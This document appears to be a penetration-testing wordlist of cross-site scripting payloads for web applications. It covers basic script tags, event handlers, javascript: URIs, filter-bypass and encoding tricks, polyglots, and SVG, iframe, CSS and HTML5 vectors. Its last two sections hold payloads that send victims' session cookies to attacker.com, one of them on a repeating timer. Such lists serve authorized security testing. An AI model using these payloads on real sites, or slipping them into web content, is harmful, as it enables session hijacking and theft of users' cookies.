# XSS Payloads Collection
# Accuracy: 88%

# Basic XSS
<script>alert('XSS')</script>
<script>alert(document.domain)</script>
<script>alert(window.location)</script>
<svg onload=alert(1)>
<img src=x onerror=alert(1)>
<body onload=alert(1)>
<iframe src=javascript:alert(1)>

# Event Handlers
" onmouseover="alert(1)
' onfocus='alert(1)' autofocus 
" onload="alert(1)
" onerror="alert(1)
<svg/onload=alert(1)>

# JavaScript URI
javascript:alert(1)
JaVaScRiPt:alert(1)
jav&#x61;script:alert(1)

# Bypass Filters
<scr<script>ipt>alert(1)</scr</script>ipt>
<<script>script>alert(1)<</script>/script>
<scr\x00ipt>alert(1)</script>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

# Polyglot XSS
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

# DOM XSS
#"><img src=/ onerror=alert(1)>
</script><script>alert(1)</script>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

# SVG XSS
<svg><script>alert('XSS')</script></svg>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>

# Iframe XSS
<iframe src="javascript:alert(1)"></iframe>
<iframe srcdoc="<script>alert(1)</script>"></iframe>

# Form XSS
<form><button formaction="javascript:alert(1)">X</button>

# Meta Tag XSS
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">

# Link XSS
<a href="javascript:alert(1)">Click</a>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click</a>

# CSS XSS
<div style="background:url('javascript:alert(1)')">
<style>@import 'javascript:alert(1)';</style>

# HTML5 XSS
<video><source onerror="alert(1)">
<audio src=x onerror=alert(1)>

# Bypass with Encoding
&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;

# Advanced XSS
<script>fetch('https://attacker.com/?cookie='+document.cookie)</script>
<img src=x onerror="location.href='https://attacker.com/steal?cookie='+document.cookie">

# Stored XSS Payloads
<script>setInterval(function(){document.images[0].src='https://attacker.com/?'+document.cookie},1000)</script>
